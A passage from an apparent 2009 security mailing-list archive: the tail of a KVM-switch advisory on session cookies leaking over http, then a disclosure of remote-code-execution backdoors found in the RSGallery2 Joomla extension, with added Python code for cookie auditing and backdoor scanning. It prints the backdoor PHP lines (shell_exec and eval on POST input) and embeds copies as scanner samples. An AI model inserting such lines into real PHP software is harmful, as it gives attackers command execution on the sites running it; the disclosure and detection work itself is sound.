http to the kvm switch is not protected, a man in the middle attacker
can inject some dynamic content so that the browser automatically
reloads the http site after logging in.
Severity: Low

The vendor has been notified about CVE-2009-1473 on 5.3.2009 and about
the other issues on 30.4.2009. Up to now we have not received a firmware
upgrade.

Suggested workaround: Avoid connecting to the KVM Switch via untr
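
An added example, not from the post or the vendor, for the session-cookie issue described above: it checks whether a Set-Cookie header issued over https carries the Secure attribute and models which cookies a browser attaches to an http versus an https request. The cookie name and value are constructed.

```python
from http.cookies import SimpleCookie
from typing import List


def parse_set_cookie(header: str) -> SimpleCookie:
    """Parse one Set-Cookie header value, attributes included."""
    jar = SimpleCookie()
    jar.load(header)
    return jar


def audit_session_cookie(set_cookie_header: str) -> List[str]:
    """Findings for a session cookie issued over https. The Secure attribute
    (RFC 2109 / RFC 6265) is what stops the browser from replaying the cookie
    over plain http, which is the leak path the advisory describes."""
    findings = []
    for name, morsel in parse_set_cookie(set_cookie_header).items():
        if not morsel["secure"]:
            findings.append(f"{name}: no Secure attribute, browser will send it over http too")
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly attribute, readable by page scripts")
    return findings


def cookies_sent(set_cookie_header: str, scheme: str) -> List[str]:
    """Model the browser rule: a Secure cookie only travels over https; a cookie
    without it is attached to http requests to the same host as well."""
    jar = parse_set_cookie(set_cookie_header)
    return [name for name, morsel in jar.items()
            if scheme == "https" or not morsel["secure"]]


# Constructed headers: the first mirrors the device behaviour the advisory
# describes (no Secure flag on the session id), the second is the corrected form.
WEAK_HEADER = "SESSIONID=a1b2c3d4e5f6; Path=/"
FIXED_HEADER = "SESSIONID=a1b2c3d4e5f6; Path=/; Secure; HttpOnly"
```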

Backdoor in com_rsgallery2 gallery extension for joomla

2009-05-26 Thread Jan van Niekerk
Vulnerability:
Remote code execution back door(s)

Software:
RSGallery2 - Gallery Extension for Joomla!
We are currently working on a new website. All files are still available at
the JoomlaCode project page.

Severity:
Not a big deal.  Joomla components contain all sorts of obfuscated junk all
the time.  Who cares what it does?

URLs:
http://rsgallery2.net/
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip

Joomlacode.org says, about these releases:
RSGallery2 1.14.3 Security Release
Jonah Braun
2008-02-13
This is an updated production alpha containing a low threat security fix. If
you use commenting you should upgrade. An option to show/hide the Search box
has also been added. See the official site for downloads and support:
http://rsgallery2.net/

RSGallery2 2.0.0b1 released
John Caprez
2008-06-23
This is the first version of RSGallery2 that runs in Joomla 1.5 native mode.

Special thanks goes to all the translators providing the updated language
files and the testers of the nightly builds.
Download it and enjoy. Feel free to report any bugs or problems in the forum
at the RSGallery2 main web site

Vendor notified:
  I tried.  Not very hard though.  joomlacode doesn't seem to have a security 
  contact and links to joomla.org as if they are the same crowd.  I'm sending 
  a BCC to the given address for Jonah Braun though.  I'll send it to bugtraq, 
  and they will sit on it for a few hours.
  http://developer.joomla.org/security.html
  Huh?  Do I need more coffee, or does this page say to contact them using 
  the details at this page?  So you do that, and it says ... no wait, 
  infloop.  Oh wait, there is a contact form.  Filled something in.  Blah.

Vulnerability:

% wget \
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip

% unzip com_rsgallery2_legacy_1.14.3.zip

% egrep -r '(eval|exec).*POST' .

./language/english-utf8.php:$result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
./language/english-utf8.php:$result = shell_exec($_POST['cmd'] . " 2>&1");
./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
./includes/rsgallery.class.php:eval($_POST['php']);
./includes/rsgallery.class.php:$out = execute($_POST['alias']);

There's other fun obfuscated javascript hiding in 'eval's'.

Ditto version 2

nuf sed  &:-)
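
An added example, not the poster's or the project's code, that generalises the egrep above into a small backdoor scanner: it flags PHP sinks fed by request superglobals and eval() fed by a decoder, which is how the "obfuscated junk" the post mentions usually hides a payload. The sample files are constructed to mirror the lines the post found; the base64 string is a placeholder.

```python
import os
import re
import tempfile
from typing import List, Tuple

# Dangerous PHP sinks. "exec\w*" also catches wrappers such as execute(),
# which is how the post's egrep spotted the call in rsgallery.class.php.
SINK_RE = re.compile(
    r"\b(?:eval|exec\w*|shell_exec|system|passthru|popen|proc_open|assert)\s*\(",
    re.IGNORECASE)
# Anything the HTTP client controls.
SUPERGLOBAL_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER|FILES)\b")
# eval() of a decoded blob: the usual way to hide a payload in an extension.
OBFUSCATION_RE = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE)

Finding = Tuple[str, int, str, str]   # (path, line number, kind, source line)


def scan_php_source(path: str, text: str) -> List[Finding]:
    """Line-oriented scan of one PHP file's text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SINK_RE.finditer(line):
            # A sink whose argument list (rest of the line) carries request input.
            if SUPERGLOBAL_RE.search(line, m.end()):
                findings.append((path, lineno, "request-to-sink", line.strip()))
                break
        if OBFUSCATION_RE.search(line):
            findings.append((path, lineno, "obfuscated-eval", line.strip()))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Walk an unpacked extension and scan every PHP source file in it."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith((".php", ".inc", ".phtml")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_php_source(os.path.relpath(full, root), fh.read()))
    return findings


# Constructed samples modelled on the lines the post's egrep turned up.
SAMPLE_FILES = {
    "language/english-utf8.php": (
        "<?php\n"
        "$lang['TITLE'] = 'Gallery';\n"
        "$result = shell_exec($_POST['cmd'] . \" 2>&1 ; pwd\");\n"
    ),
    "includes/rsgallery.class.php": (
        "<?php\n"
        "$title = htmlspecialchars($_POST['title']);   // benign use of input\n"
        "$out = execute($_POST['cmd']);\n"
        "eval($_POST['php']);\n"
        "eval(base64_decode('QUJD'));   // placeholder blob, decodes to 'ABC'\n"
    ),
}


def scan_sample_tree() -> List[Finding]:
    """Write the constructed samples to a temp dir, scan them, return findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, lineno, kind, src in scan_sample_tree():
        print(f"{path}:{lineno}: [{kind}] {src}")
```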